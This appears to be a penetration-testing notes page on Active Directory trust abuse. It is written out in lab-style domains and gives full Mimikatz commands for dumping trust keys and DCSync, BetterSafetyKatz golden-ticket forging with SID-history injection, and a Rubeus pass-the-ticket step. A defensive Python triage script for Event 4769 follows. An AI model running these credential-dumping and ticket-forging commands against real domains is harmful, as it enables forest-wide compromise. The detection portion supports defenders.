# Trusts

## Trust Flow

The diagram below shows how a client from a trusted domain can request access to a service in another domain.

We can see that, in order to allow access to the service hosted in Domain B, a TGT for Domain B is returned within a TGS-REP, signed with the inter-realm trust key.

<img src="/files/wC6jv96Gmu9rq3hYMQqa" alt="" class="gitbook-drawing">

## Exploitation

The TGS-REQ step (marked red in the diagram above) can be abused by forging a new inter-realm TGT with the trust key.

### Get the trust key

The trust key is required to forge the Inter-Realm TGT.

```powershell
# Dump the trust keys from LSA (run on a domain controller)
Invoke-Mimikatz -Command '"lsadump::trust /patch"'
# Dump all LSA secrets, which include the trust account keys
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
# DCSync the trust account of the parent domain (mcorp$) from the child domain
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\mcorp$"'
```

### Forge the Inter-Realm TGT

Note that the krbtgt hash can be used instead of the trust key.

{% code overflow="wrap" %}

```powershell
# Child to parent: inter-realm TGT signed with the trust key, saved to disk
C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /rc4:e9ab2e57f6397c19b62476e98e9521ac /service:krbtgt /target:moneycorp.local /ticket:C:\AD\Tools\trust_tkt.kirbi" "exit"

# Using the krbtgt hash instead: the ticket is injected directly (/ptt), so no TGS has to be requested afterwards
C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /krbtgt:4e9815869d2090ccfca61c1fe0d23986 /ptt" "exit"

# Across a forest trust: same idea, targeting the other forest's krbtgt service
C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /rc4:2756bdf7dd8ba8e9c40fe60f654115a0 /service:krbtgt /target:eurocorp.local /ticket:C:\AD\Tools\trust_forest_tkt.kirbi" "exit"
```

{% endcode %}

| Option | Description |
| --- | --- |
| `/domain:` | FQDN of the current domain |
| `/sid:` | SID of the current domain |
| `/sids:` | SID(s) to inject into the ticket's SID history |
| `/rc4:` | RC4 hash of the trust key |
| `/krbtgt:` | krbtgt hash, usable instead of the trust key |
| `/user:` | User to impersonate |
| `/service:` | Target service in the parent domain |
| `/target:` | FQDN of the parent domain |
| `/ticket:` | Path to save the ticket |

### Request the TGS and pass it

{% code overflow="wrap" %}

```powershell
Rubeus.exe asktgs /ticket:C:\AD\Tools\trust_tkt.kirbi /service:cifs/mcorp-dc.moneycorp.local /dc:mcorpdc.moneycorp.local /ptt
```

{% endcode %}
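From the defender's side, the final step above leaves a trace on the parent domain controller: the `asktgs` request produces a Kerberos service-ticket event (Event ID 4769) in which a child-domain account asks for a ticket to a parent service, and a ticket forged with the `/rc4:` trust key is RC4-encrypted (encryption type `0x17`). The following Python is an added triage example, not part of these notes or of any tool they mention: it runs two heuristics over constructed 4769 records (field names follow the event's EventData; `RecordId` stands in for the system EventRecordID) and reports the records that match. The baseline of AES-capable service accounts and the list of watched account names are assumptions a real deployment would maintain itself.

```python
"""Heuristic triage of Kerberos TGS requests (Event ID 4769) for the
forged inter-realm TGT pattern. Added example with constructed records."""
from dataclasses import dataclass, field

RC4_HMAC = "0x17"   # TicketEncryptionType of a ticket encrypted with an RC4 (NT hash) key
SUCCESS = "0x0"     # Status of a successful TGS-REQ


@dataclass
class Finding:
    record_id: int
    user: str
    service: str
    reasons: list = field(default_factory=list)

    @property
    def severity(self) -> str:
        # Both rules firing on one request is the strongest signal.
        return "high" if len(self.reasons) > 1 else "medium"


def bare_user(target_user_name: str) -> str:
    """'Administrator@DOLLARCORP.MONEYCORP.LOCAL' -> 'administrator'."""
    return target_user_name.split("@", 1)[0].lower()


def analyze_4769(events, local_domain, aes_capable_services, watch_users):
    """Return one Finding per successful 4769 record that matches at least one rule.

    local_domain          realm of the DC that logged the events (the trusting side)
    aes_capable_services  ServiceName values (account names) known to hold AES keys,
                          so an RC4-encrypted ticket for them is a downgrade
    watch_users           bare account names that should not be seen crossing a trust
    """
    findings = []
    for ev in events:
        if ev["Status"] != SUCCESS:
            continue  # failed requests are a different signal, handled elsewhere
        reasons = []
        if ev["TicketEncryptionType"] == RC4_HMAC and ev["ServiceName"] in aes_capable_services:
            reasons.append("rc4_ticket_for_aes_service")
        crossed_trust = ev["TargetDomainName"].upper() != local_domain.upper()
        if crossed_trust and bare_user(ev["TargetUserName"]) in watch_users:
            reasons.append("cross_trust_privileged_name")
        if reasons:
            findings.append(Finding(ev["RecordId"], ev["TargetUserName"],
                                    ev["ServiceName"], sorted(reasons)))
    return findings


# Constructed sample records as the parent DC (moneycorp.local) would log them.
# ServiceName is the service *account*: a ticket for cifs/mcorp-dc.moneycorp.local
# is logged against the host account MCORP-DC$.
SAMPLE_EVENTS = [
    # 1: the page's final step, child-domain Administrator with an RC4 inter-realm TGT
    {"RecordId": 1, "TargetUserName": "Administrator@DOLLARCORP.MONEYCORP.LOCAL",
     "TargetDomainName": "DOLLARCORP.MONEYCORP.LOCAL", "ServiceName": "MCORP-DC$",
     "TicketEncryptionType": "0x17", "Status": "0x0"},
    # 2: ordinary cross-domain access by a regular user, AES256 ticket
    {"RecordId": 2, "TargetUserName": "jdoe@DOLLARCORP.MONEYCORP.LOCAL",
     "TargetDomainName": "DOLLARCORP.MONEYCORP.LOCAL", "ServiceName": "MCORP-DC$",
     "TicketEncryptionType": "0x12", "Status": "0x0"},
    # 3: RC4 ticket for a legacy service account that is not in the AES baseline
    {"RecordId": 3, "TargetUserName": "svc-legacy@MONEYCORP.LOCAL",
     "TargetDomainName": "MONEYCORP.LOCAL", "ServiceName": "legacyapp",
     "TicketEncryptionType": "0x17", "Status": "0x0"},
    # 4: local user obtaining an RC4 ticket for the DC: downgrade only
    {"RecordId": 4, "TargetUserName": "bob@MONEYCORP.LOCAL",
     "TargetDomainName": "MONEYCORP.LOCAL", "ServiceName": "MCORP-DC$",
     "TicketEncryptionType": "0x17", "Status": "0x0"},
    # 5: same shape as record 1 but the KDC refused it (KDC_ERR_CLIENT_REVOKED), so skipped
    {"RecordId": 5, "TargetUserName": "Administrator@DOLLARCORP.MONEYCORP.LOCAL",
     "TargetDomainName": "DOLLARCORP.MONEYCORP.LOCAL", "ServiceName": "MCORP-DC$",
     "TicketEncryptionType": "0x17", "Status": "0x12"},
]

# Assumed environment baseline (hypothetical values).
AES_CAPABLE_SERVICES = {"MCORP-DC$"}
WATCH_USERS = {"administrator", "krbtgt"}


def triage_sample():
    return analyze_4769(SAMPLE_EVENTS, "MONEYCORP.LOCAL", AES_CAPABLE_SERVICES, WATCH_USERS)


if __name__ == "__main__":
    for f in triage_sample():
        print(f"[{f.severity}] record {f.record_id}: {f.user} -> {f.service}: {', '.join(f.reasons)}")
```

Both rules are heuristics and need baselining before they page anyone: environments with legacy RC4-only services will trip the downgrade rule, and a ticket forged with an AES trust key instead of `/rc4:` never produces `0x17` at all, which is why the cross-trust rule is kept separate. The `/sids:` injection in the forging step also explains the two variants on this page: SID filtering on forest trusts strips foreign SID history, so the cross-forest ticket above carries no `/sids:`, whereas it is not applied between a child and its parent, which is why the domain boundary is not a security boundary and the forest is.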

